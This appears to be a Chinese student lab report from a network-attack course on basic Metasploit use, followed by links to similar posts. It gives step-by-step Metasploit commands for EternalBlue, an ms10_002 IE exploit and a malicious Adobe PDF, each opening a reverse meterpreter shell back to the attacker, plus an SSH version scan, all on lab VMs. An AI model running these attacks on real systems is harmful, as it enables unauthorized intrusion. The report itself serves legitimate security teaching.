2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础

实验内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,完成ms17-010-eternalblue(成功); (1分)

1.2 一个针对浏览器的攻击,完成ms10_002(成功);(1分)

1.3 一个针对客户端的攻击,如Adobe(成功);(1分)

1.4 成功应用任何一个辅助模块:scanner/ssh/ssh_verision(成功且唯一)。(0.5分)

1.5 报告评分(1分)

基础问题回答

用自己的话解释什么是exploit,payload,encode.

  1. exploit:利用msf中选择的模块,payload以及攻击对象的信息对目标机的漏洞进行攻击的过程。
  2. payload:当我们选择利用某一个漏洞进行攻击时,需要选择一个payload,可以说是选择一种代码,或者说是对这个漏洞的攻击方式。
  3. encode:对payload进行编码,降低被查出的风险。

实践过程记录

1.一个主动攻击实践,完成ms17_010-eternalblue永恒之蓝攻击

  • 攻击机:kali IP:10.1.1.216
  • 靶机:windows XP系列:全都没有成功
  • 靶机:windows server 2008(中文) IP:10.1.1.166

    步骤如下

  • 先对靶机进行漏洞扫描nmap -script vnlu 10.1.1.166可以看到win server 2008系统没有ms08漏洞,但是有ms17_010漏洞

  • search ms17_010查找相关模块
  • 使用exploit/windows/smb/ms17_010_eternalblue
  • 输入use exploit/windows/smb/ms17_010_eternalblue
  • set payload windows/x64/meterpreter/reverse_tcp设置payload
  • set rhost 10.1.1.166填写靶机IP
  • set lhost 10.1.1.216填写攻击机IP
  • set lport 5205填写攻击机端口号

  • run开始攻击
  • 攻击成功可以看到session 1 opened

  • 输入shell可以得到命令行
  • 可以通过dir查看windows/system32下的文件

2.一个针对浏览器的攻击,完成ms10_002

  • 攻击机:kali IP:10.1.1.216
  • 靶机:windows XP SP3(中文) IP:10.1.1.235
  • 这个漏洞需要靶机访问攻击机的网站IE浏览器的版本需要是7及7以下
  • set lhost 10.1.1.216设置攻击机IP
  • set srvport 80
  • set lport 443设置端口

  • 然后exploit就可以等待了
  • 打开XP的IE浏览器,访问http://10.1.1.216:80

  • 这是攻击机可以看到会话已经建立了

  • sessions先看一下会话号
  • session -i 4这里的数字是会话号,需要提前查,只有在浏览器还开着的时候才能打开对话,要抓紧时间得到shell

  • shell之后,这次我用的是net start查看功能

3.一个针对客户端的攻击,如Adobe

  • 攻击机:kali IP:10.1.1.216
  • 靶机:windows XP SP3(中文) IP:10.1.1.235 adobereader9
  • use exploit/windows/fileformat/adobe_cooltype_sing使用这个模块
  • set payload windows/meterpreter/reverse_tcp使用这个payload
  • set lhost 10.1.1.216设置攻击IP
  • set FILENAME 20165205.pdf设置攻击文件的名称

  • exploit即可产生攻击文件
  • 将文件移动到XP里
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost 10.1.1.216
  • set lport 5205
  • exploit

  • 以上都是十分熟悉的步骤
  • 之后打开pdf文件,kali就攻击成功了
  • 得到shell后就可以操作一番了

4.成功应用任何一个辅助模块:scanner/ssh/ssh_verision

  • use auxiliary/scanner/ssh/ssh_version辅助模块的scanner下的功能基本都是扫描功能的,这个模块的功能是扫描ssh的版本
  • set rhosts 10.1.1.0/24扫描10.1.1网段的所有子网
  • run或者exploit之后需要等待
  • 最后扫描到的是kali的ssh版本号hhhhh

实验中遇到的问题

  1. 问题:做ms08攻击时,遇到no session的问题
    解决方法:可能是操作系统版本的问题,我在之后换靶机的时候回先用nmap扫描一下版本漏洞在攻击。
  2. 在auxiliary的辅助模块中很多都读不懂,选择了比较简单的scanner模块,但是其他模块还是有很多的,希望以后可以用到

实践总结与体会

  1. 实践中遇到很多次攻击后发现攻击没有成果,去找原因的时候发现是系统打过补丁或者是软件版本较高漏洞被修补,所以以后再做时要先扫描漏洞,而不是盲目地直接攻击。
  2. 每一个攻击模块都可以查看options,写yes都是需要填写的

离实战还缺什么技术和步骤

我们现在的操作都要求漏洞是没有被打过补丁或者没有更新过的,但是现实我们现在用的软件,系统都是没有这些很明显的漏洞的,我们的利用的漏洞都是被人发现过的,也就是说是被破解的,我们现实中想要攻击还需要自己去发现漏洞才行。

2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础的更多相关文章

  1. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  2. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  3. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  4. 2018-2019 20165220 网络对抗 Exp5 MSF基础

    实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...

  5. 2018-2019 20165219 网络对抗 Exp5 MSF基础

    实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...

  6. 20145338 《网络对抗》 MSF基础应用

    20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...

  7. 20145308 《网络对抗》 MSF基础应用 学习总结

    20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...

  8. 20145326蔡馨熤《网络对抗》——MSF基础应用

    20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...

  9. 20155218《网络对抗》MSF基础应用

    20155218<网络对抗>MSF基础应用 实验过程 1.一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞: show target 查看可以 ...

  10. 20155304《网络对抗》MSF基础应用

    20155304<网络对抗>MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_ ...

随机推荐

  1. ORACLE用户表空间使用情况查询

    1.查询用户使用的表空间: select username,default_tablespace,temporary_tablespace from dba_users where username ...

  2. Python练习十

    1.生成随机整数,从1-5取出来然后输入一个数字,来猜,如果大于,则打印bigger小了,则打印less如果相等,则打印equal. import random num1 = random.randi ...

  3. 引擎设计跟踪(九.14.2 final) Inverse Kinematics: CCD 在Blade中的实现

    因为工作忙, 好久没有记笔记了, 但是有时候发现还得翻以前的笔记去看, 所以还是尽量记下来备忘. 关于IK, 读了一些paper, 觉得之前翻译的那篇, welman的paper (http://gr ...

  4. 前端基础:canvas概述

    1:并不是所有的浏览器都支持canvas,若是不支持则浏览器会弹出 <canvas>Update your browser to enjoy canvas</canvas> 浏 ...

  5. 如何在C++中使用动态三维数组

    目录 1. 使用new和delete来构造 2. 使用malloc和free来构造 3.构造函数来生成数组 1. 使用new和delete来构造 在使用new申请内存时,在使用过后,一定要采用dele ...

  6. Luminar 3 for Mac(照片编辑工具)v3.1.0中文特别版

    Luminar for Mac是一款多功能照片编辑软件,使用独特的AI工具加快速度,具备AI Sky Enhancer.Accent AI.太阳光线等创新功能.当然也保留了原有的功能,帮助你轻松的修复 ...

  7. jumpserver堡垒机部署

    初稿(后面我有时间再整理一下,看能不能弄成自动化脚本安装): systemctl stop firewalld #关闭防火墙setenforce 0 #关闭selinuxyum install htt ...

  8. 通过ZipKin整理调用链路

    缘由 公司使用的是Docker+微服务,服务拆分差不多41个了,然后过完年来就接到这个需求,把指定业务功能的业务基线整理出来,比如,登录这个操作会经过哪些微服务,把登录这个操作的链条列出来,从api- ...

  9. mysql用户管理及授权

    以mariadb5.5版本为例 新建用户 登录mariadb # mysql -uroot -p Enter password: Welcome to the MariaDB monitor. Com ...

  10. Spring Cloud Alibaba正式入驻Spring Cloud官方孵化器

    第一个版本发布内容如下: 开源组件(spring-cloud-alibaba开头): 服务发现(Service Discovery) 配置管理(Configuration Management) 高可 ...